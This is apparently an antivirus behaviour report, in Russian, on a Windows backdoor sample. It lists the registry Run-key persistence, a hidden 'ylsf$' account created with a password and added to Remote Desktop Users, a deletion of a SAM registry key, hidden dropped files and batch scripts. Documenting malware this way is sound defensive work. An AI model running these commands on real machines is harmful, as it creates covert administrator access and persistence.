Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'SQLServer' = '<SYSTEM32>\Com\Comadmin.exe'
- '<SYSTEM32>\Com\Comadmin.exe'
- '<SYSTEM32>\net1.exe' localgroup "Remote Desktop Users" ylsf$ /add
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s ylsf$ /add
- '<SYSTEM32>\net1.exe' localgroup "HelpServicesGroup" ylsf$ /add
- '<SYSTEM32>\reg.exe' delete HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Groups\00000201 /f
- '<SYSTEM32>\net1.exe' user ylsf$ /active:yes
- '<SYSTEM32>\net1.exe' user ylsf$ 294011500
- '<SYSTEM32>\attrib.exe' +h +s +r <SYSTEM32>\Com\Comadmin.exe
- '<SYSTEM32>\cmd.exe' /c ""<Текущая директория>\qd.bat" "
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SQLServer /d "<SYSTEM32>\Com\Comadmin.exe" /f
- '<SYSTEM32>\net1.exe' user ylsf$ 294011500 /add
- '%WINDIR%\regedit.exe' /s temp.reg
- %TEMP%\bt7754.bat
- <Текущая директория>\temp.reg
- <SYSTEM32>\Com\Comadmin.exe
- <Текущая директория>\yh.exe
- <Текущая директория>\qd.bat
- %TEMP%\bt7754.bat
- <SYSTEM32>\Com\Comadmin.exe
- %TEMP%\bt7754.bat
- <Текущая директория>\temp.reg
- <Текущая директория>\yh.exe
- ClassName: 'RegEdit_RegEdit' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'